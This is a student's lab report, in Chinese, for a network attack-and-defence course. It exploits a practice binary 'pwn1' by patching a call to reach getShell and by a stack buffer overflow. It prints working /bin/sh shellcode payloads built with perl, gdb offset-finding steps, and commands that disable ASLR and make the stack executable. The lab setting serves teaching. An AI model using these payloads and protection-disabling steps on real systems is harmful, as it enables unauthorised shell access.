20212937 曾俊铭 网络攻防实验报告

20212937 曾俊铭 2021-2022-2 《网络攻防实践》实践报告

1.实践内容

实践目标:

本次实践的对象是一个名为pwn1的linux可执行文件。

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

实验要求

• 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
• 掌握反汇编与十六进制编程器
• 能正确修改机器指令改变程序执行流程
• 能正确构造payload进行bof攻击

2.实践过程

2.1手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数

• 通过云班课下载上传文件pwn1，打开Kali，输入命令“objdump -d pwn1”对该文件进行反汇编。
  

• 对以上反汇编结果进行分析：这里是三个函数main、getshell、foo。首先看main函数的调用情况，找到“80484b5: e8 d7 ff ff ff call 8048491 ”这一行，“call 8048491 ”是汇编指令，其含义是调用地址为8048491的foo函数，“e8 d7 ff ff ff”是机器指令，e8的含义是“跳转”，EIP（Extended Instruction Pointer，扩展指令指针）值指的是下一条指令的地址：80484ba，这条机器指令的意思是转而执行下一条位于地址80484ba的指令。由于main函数调用foo函数的机器指令为“e8 d7 ff ff ff”，所以要想调用getshell函数，只需把“d7 ff ff f”f改为getShell-80484ba对应的补码即可，因为47d-ba得到补码为c3 ff ff ff，因此main函数调用getshell函数的机器指令为“e8 c3 ff ff ff”。

• 更改可执行文件，将call指令的目标地址由原来的“d7 ff ff ff”改为“c3 ff ff ff”。输入命令“vim pwn1”开始更改。
  

• 输入指令“:%! xxd”，回车,将显示模式切换为16进制模式：
  

• 找到这一行,先点击Ctrl+I进入插入模式，将“e8 d7”改为“e8 c3”。然后点击Esc，输入:wq保存并退出。

• 输入指令“:%! xxd -r”将十六进制模式改回原格式，保存并退出
  

2.2利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数

2.2.1反汇编，了解程序的基本功能

• 将pwn1反汇编后查看foo函数，该函数的功能是调用gets读进用户输入的字符串然后用puts函数将字符串输出，但是该函数并没有检查用户输入，所以存在BOF漏洞。
• 观察反汇编出的汇编代码得知预留的局部变量的空间为0x38，而gets函数将读取到的字符串存放到0x1c（28个字节）处，根据堆栈结构，当输入字符串长度达到36时，第33~36个字节将会覆盖到EIP中
  

2.2.2确定输入字符串的那几个字符会覆盖返回地址

• “apt install gdb”安装，输入命令“gdb pwn1”调式程序。
  

• 输入“r”，表示运行这个文件，输入有规律的字符串“1111111122222222333333334444444455555555”，程序输出该字符串，报错“Segmentation fault”，原因是输入超过28个，程序无法正常退出，产生溢出
  

2.2.3确认用什么值覆盖返回地址

• 使用gdb对pwn1进行调试，当输入长度为40的字符串“1111111122222222333333334444444455555555”后出现段错误，查看各寄存器状态可以发现当前EIP寄存器的内容为0x35353535（“5”的ASCLL码的十六进制为35），因此可以说明当输入字符串过长时，第33~36个字节将会覆盖EIP的内容
  

2.3注入一个自己制作的shellcode并运行这段shellcode

• 把prelink_0.0.20130503.orig.tar放到kali虚拟机中,在虚拟机中解压缩,在解压缩文件中打开终端
  输入命令行：
  sudo apt-get install libelf-dev
  ./configure
  make
  sudo make install

• 准备一段Shellcode，shellcode是一段机器指令（code）

首先使用“apt-get install execstack”命令安装execstack

输入execstack -s pwn1设置堆栈可执行；

输入execstack -q pwn1查询文件的堆栈是否可执行

输入more /proc/sys/kernel/randomize_va_space查询是否关闭地址随机

输入echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化

输入“more /proc/sys/kernel/randomize_va_space”查询是否关闭地址随机化

• 构造要注入的payload。输入命令perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode进行注入，其中，前32个A是用来填满缓冲区buf，“\x04\x03\x02\x01”是预留的返回地址retaddr。
  

• 然后在该终端运行(cat input_shellcode;cat) | ./pwn1注入这段攻击buf，打开另一个终端，运行ps -ef | grep pwn，可以看到pwn的进程21016。
  

• 用gdb的attach 21016命令，启动gdb调试这个进程。
  

• 用disassemble foo命令反汇编，设置断点查看注入buf的内存地址。
  

• 输入b *0x080484ae命令设置断点，输入c命令(continue)继续运行。
  

• 在进程正在运行的终端敲回车，使其继续执行
  

• 再返回调试终端，输入info r esp命令查找地址为x/16x 0xffffd5bc
  

• 输入x/16x 0xffffd5bc命令查看其存放内容，看到了0x01020304，就是返回地址的位置。根据我们构造的input_shellcode可知，shellcode就在其后，x/16x 0xffffd5bc+0x00000004=0xffffd5c0，所以地址应为0xffffd5c0
  

• 接下来只需要将之前的\x4\x3\x2\x1改为这个地址0xffffd5c0即可，用命令perl -e 'print "A" x 32;print "\xc0\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode。
  

• 再用(cat input_shellcode;cat) | ./pwn1命令次执行程序，攻击成功
  

3.学习中遇到的问题及解决

• 问题1：kali一直找不到prelink所在目录？
• 问题1解决方案：将prlink下载在主机安装后在拖入虚拟机kali

4.实践总结

通过这次实验自己对机器指令、十六进制、反汇编、gdb调试和BOF攻击等安全知识有了进一步的了解学习，并进行了简单的应用，对于后面的学习打下了基础，实验有一点复杂，但更多的还是理论基础，希望能进一步学习吧。